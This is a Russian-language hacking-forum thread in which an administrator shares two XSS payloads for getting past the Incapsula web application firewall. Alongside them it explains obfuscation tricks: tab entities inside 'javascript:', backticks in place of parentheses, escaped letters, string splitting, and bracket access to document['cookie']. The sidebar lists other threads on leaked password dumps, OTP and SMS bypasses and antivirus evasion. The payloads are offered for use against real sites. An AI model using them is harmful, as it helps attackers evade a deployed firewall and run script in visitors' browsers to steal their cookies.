Несколько векторов обхода для Incapsula WAF

Admin

Original poster
Administrator
Сообщения
916
Реакции
753
Посетить сайт
Два вектора обхода Incapsula WAF, может кому нибудь пригодится.

Раз:

Код:
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>

И два:
Код:
<img/src=q onerror='new Function`al\ert\`1\``'>


В первом случае мы редиректим текущий url фрейма (this.src) на javascript:alert(). Про &Tab; я писал выше.

Не пускает точку? Например не проходит document.cookie?

Добавляем блоки document['cookie'] и точка нам больше не нужна (

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

). Не пускает alert - разбиваем на две строки, "al"+"ert".

— Как вызвать функцию без скобок?

Вместо скобок можно использовать бэктики (ну вот этот вот знак - `). Этой клавишей можно не только вызывать консольку в игре, запомни её!

— Что за al\ert().

Alert во втором случае будет строкой, а \e - это экранированная e, лол. А что будет если экранировать буквы? Ничего (

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

). Только не пытайся экранировать зарезервированные символы, например писать \r (возврат каретки) и \t (знак табуляции) в том же alert'е, так работать не будет.
 
Последнее редактирование:

Admin

Original poster
Administrator
Сообщения
916
Реакции
753
Посетить сайт
Обновил тему, добавил ответы на часто задаваемые вопросы и доп. инфу.
 
Название темы
Автор Заголовок Раздел Ответы Дата
Admin 40,000 / данные о регистрации на Форекс | Несколько стран | Другое 0
G Несколько миллиардов почт с паролями. Раздача email 0
D Несколько onion-ссылок для Dark Net (не моё). Полезные статьи 13
V Несколько сервисов для безопасного обмена фотографиями Полезные статьи 0
M Несколько IP камер Полезные статьи 10
A Несколько шпор по Delphi =) С/C++ 3
АнАлЬнАя ЧуПаКаБрА Несколько онлайн чекеров Бруты/Парсеры/Чекеры 3
Admin Приключения xss векторов в необычных местах Уязвимости и взлом 0
turbion0 Роскомнадзор будет блокировать VPN-протокол Shadowsocks. Он используется в Китае для обхода блокировок Новости в сети 0
Support81 Власти тайком заблокируют спецпротокол VPN для обхода блокировок. Последствия для Рунета могут оказаться разрушительными Новости в сети 1
АнАлЬнАя ЧуПаКаБрА Интересно Способ обхода OTP Amazon Другое 0
M Используем особенности Юникода для обхода WAF Уязвимости и взлом 0
S Используем особенности Юникода для обхода WAF Полезные статьи 0
B GoodbyeDPI — утилита для обхода пассивных и активных DPI под Windows Полезные статьи 0
K Как настроить почтовый сервер для обхода спам-фильтров: руководство по DNS, SPF, DKIM Уязвимости и взлом 0
G Методы обхода фильтров по расширению при загрузке файлов Полезные статьи 0
K Уроки по XSS: Урок 2. Скрытая передача данных, перехват нажатия клавиш, изменение внешнего вида сайта, подцепление на BeEF, фишинг, подсказки обхода ф Уязвимости и взлом 0
G #Обучение Способы обхода антивирусов. Полезные статьи 1
S Разработан инструмент для обхода антивирусов на Android-устройствах Новости в сети 0
S ФСБ и МВД могут привлечь к выявлению способов обхода блокировок в Сети Новости в сети 0
E Способ обхода проверки возраста на Pornhub. Полезные статьи 6
S Telegram обещал представить простой метод обхода блокировки мессенджера Новости в сети 0
M Способ обхода лимита на ввоз товаров (в ру работает 100%) Полезные статьи 0
M Способ обхода смс при входе в paypal Уязвимости и взлом 4

Название темы